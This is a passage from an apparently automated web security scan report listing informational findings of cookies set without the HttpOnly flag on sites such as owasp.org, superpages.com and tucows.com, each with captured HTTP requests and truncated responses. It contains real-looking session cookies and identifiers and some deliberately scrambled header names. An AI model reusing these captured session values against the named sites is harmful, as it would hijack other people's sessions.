x-tealeaf-page-cui-events: 2
x-tealeaf-page-url: /App/PerformMDLPDealsContent
x-tealeafsubtype: BeforeUnload
x-tealeaftype: PERFORMANCE
Content-Type: text/xml
x-tealeaf-page-dwell: 212807840
x-tealeaf-page-cui-bytes: 1372
x-tealeaf-uieventcapture-version: 2010.12.22.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.orbitz.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: BetaGroup="01/27/2011 19:52:47|A|A|N|C|N|H|B|P|N"; WT_FPC=id=173.193.214.243-504835424.30129806:lv=1296573817240:ss=1296573817240; anon=15636604731296573771992; OrbitzRegistration="N,0,0,0"; logging=4D84CD377DBEA23C09465CAB80CFF42F|egapp06p|; OSC=4D84CD377DBEA23C09465CAB80CFF42F; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73545525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e34fb045525d5f4f58455e445a4a4217b9
Content-Length: 267

<ClientEventSet PostTimeStamp="1296786625183" ><ClientEvent Count="2" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="212807840" DateSince1970="12967866251
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 89
Date: Fri, 04 Feb 2011 02:29:32 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 89

<html>
<body>
Response
<hr>
Read 267 bytes in 0ms.
</body>
</html>

13.239. http://www.owasp.org/index.php/Top_10_2010-A2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.owasp.org
Path:   /index.php/Top_10_2010-A2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/Top_10_2010-A2 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.owasp.org
Cookie: OAID=04f018b0c68d275c665f36b46a5558db; __utmc=77342603; __utma=77342603.1072302748.1296759700.1296759700.1296759700.1; __utmz=77342603.1296759700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:49:44 GMT
Server: Apache/2.2.14 (Fedora)
Vary: Accept-Encoding,Cookie
Content-language: en
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=04f018b0c68d275c665f36b46a5558db; expires=Sat, 04-Feb-2012 02:49:45 GMT; path=/
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=wiki15Token;string-contains=wiki15LoggedOut;string-contains=wiki15_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Mon, 18 Oct 2010 19:44:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:
...[SNIP]...

13.240. http://www.smartdraw.com/specials/sd/buy-sd.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/sd/buy-sd.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /specials/sd/buy-sd.htm HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ghdryw45vschkb45ydm1qanr; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=4BF13A12-DE30-415B-8029-9F6162962AF4; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=341512; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: DTIME=2/3/2011; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9835
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

13.241. http://www.smartdraw.com/specials/smartdraw.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /specials/smartdraw.asp HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:28:58 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:28:58 GMT; path=/
Set-Cookie: ASP.NET_SessionId=j5dlw2bw0rcqh345wwhvicmy; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=32669C54-C400-4785-ADA2-4B68D605EA36; expires=Sun, 03-Feb-2041 20:28:58 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:28:58 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13267
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB1 -->
       <meta http-equiv="Co
...[SNIP]...

13.242. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=37svlldgsf347c7s87vtp7eur6; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=7201754904d4b1ced1c53d1.18537805; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=e47999cdfca3ca02d942318b09c2ef89%7C%7C10%7C%7C1296768237%7C6c3c55f74134ae4c580f9262aa023fd3; expires=Sun, 31-Jan-2021 21:23:57 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7306
Date: Thu, 03 Feb 2011 21:23:57 GMT
X-Varnish: 20282270
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

13.243. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...

13.244. http://www.superpages.com/inc/social/sln.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/sln.php HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 302 Found
Date: Thu, 03 Feb 2011 19:35:15 GMT
Server: Unspecified
Vary: Host
Location:
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:15 GMT;path=/


13.245. http://www.superpages.com/inc/social/soc.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/soc.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.superpages.com

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:09:21 GMT
Server: Unspecified
Vary: Host
Last-Modified: Fri, 23 Oct 2009 19:52:55 GMT
ETag: "4fc8f-6a1-8ed453c0"
Accept-Ranges: bytes
ntCoent-Length: 1697
Connection: close
Content-Type: text/css
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:24:21 GMT;path=/
Cache-Control: private
Content-Length: 1697

/* CSS Document */
#sp_soclink_box {
   width:260px;
   background-color:#e5e5e5;
   border:1px solid #666666;
   position:absolute;
   padding:0px;
   padding-left:4px;
   padding-bottom:4px;
   margin:0;
   z-index:9
...[SNIP]...

13.246. http://www.superpages.com/inc/social/soc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.superpages.com

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:09:25 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:24:24 GMT;path=/

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...

13.247. http://www.superpages.com/inc/social/soc_email.php/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc_email.php/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/social/soc_email.php/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:14 GMT
Server: Unspecified
Vary: Host
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:14 GMT;path=/


13.248. http://www.superpages.com/superguarantee/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /superguarantee/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /superguarantee/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:25 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:25 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...

13.249. http://www.supertradeexchange.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supertradeexchange.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.supertradeexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13237
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/
Date: Thu, 03 Feb 2011 19:35:26 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>SuperTradeExchange&reg; - a small business community and barter netwo
...[SNIP]...

13.250. http://www.tucows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...

13.251. http://www.tucows.com/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.252. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.253. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.254. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

13.255. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

